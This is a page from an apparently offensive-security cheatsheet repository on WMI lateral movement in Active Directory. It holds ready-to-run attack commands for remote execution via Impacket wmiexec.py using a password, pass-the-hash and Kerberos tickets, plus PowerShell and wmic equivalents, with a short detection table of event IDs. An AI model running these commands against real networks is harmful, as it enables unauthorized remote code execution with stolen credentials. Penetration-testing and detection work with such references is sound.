daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

attack-58-wmi-lateral-movement.md (2943B)


      1 ---
      2 title: "Attack #58 — WMI Lateral Movement"
      3 description: "WMI (Windows Management Instrumentation) enables remote process execution via the Win32_Process.Create() method. WMI-based execution is the stealthiest…"
      4 category: active-directory
      5 subcategory: "Lateral Movement"
      6 tags: ["active-directory", "kerberos", "lateral-movement", "hashing"]
      7 tools: ["Impacket", "PowerShell"]
      8 difficulty: advanced
      9 updated: "2026-08-10"
     10 source: "vault:ActiveDirectory/AD-Attack/Category-Seven/⚫ Attack #58 — WMI Lateral Movement.md"
     11 ---
     12 # ⚫ Attack #58 — WMI Lateral Movement
     13 
     14 ***
     15 
     16 ## 📖 How It Works
     17 
     18 WMI (Windows Management Instrumentation) enables remote process execution via the `Win32_Process.Create()` method. WMI-based execution is **the stealthiest Impacket execution method** — it doesn't create services, doesn't write files to disk, and runs commands in the context of the authenticated user (not SYSTEM).
     19 
     20 ***
     21 
     22 ## ⚙️ Prerequisites
     23 
     24 | Requirement | Detail |
     25 |---|---|
     26 | **Local admin on target** | Required for WMI access |
     27 | **WMI / DCOM ports** | TCP 135 + dynamic RPC |
     28 
     29 ***
     30 
     31 ## 💻 Full Commands
     32 
     33 ```bash
     34 # ── Impacket wmiexec.py (best stealth) ────────────────────────────────────────
     35 wmiexec.py corp.local/Administrator:'Password1'@10.10.10.10
     36 
     37 # ── PtH ───────────────────────────────────────────────────────────────────────
     38 wmiexec.py corp.local/Administrator@10.10.10.10 -hashes :2b576acbe6bcfda7294d6bd18041b8fe
     39 
     40 # ── Kerberos ──────────────────────────────────────────────────────────────────
     41 export KRB5CCNAME=admin.ccache
     42 wmiexec.py -k -no-pass corp.local/Administrator@DC01.corp.local
     43 
     44 # ── Single command ────────────────────────────────────────────────────────────
     45 wmiexec.py corp.local/Administrator:'Password1'@10.10.10.10 "ipconfig /all"
     46 ```
     47 
     48 ```powershell
     49 # ── Native PowerShell / wmic ──────────────────────────────────────────────────
     50 Invoke-WmiMethod -Class Win32_Process -Name Create -ArgumentList "cmd.exe /c whoami > C:\Temp\out.txt" -ComputerName TARGET
     51 wmic /node:TARGET process call create "cmd.exe /c whoami > C:\Temp\out.txt"
     52 ```
     53 
     54 ***
     55 
     56 ## 🛡️ Detection — Event IDs
     57 
     58 | Event ID | Source | What to Look For |
     59 |---|---|---|
     60 | **4624** | Security Log | Logon Type 3 via WMI |
     61 | **4688** | Security Log | cmd.exe spawned by WmiPrvSE.exe |
     62 
     63 ***
     64 
     65 > ✅ **Attack #58 — WMI Lateral Movement complete.**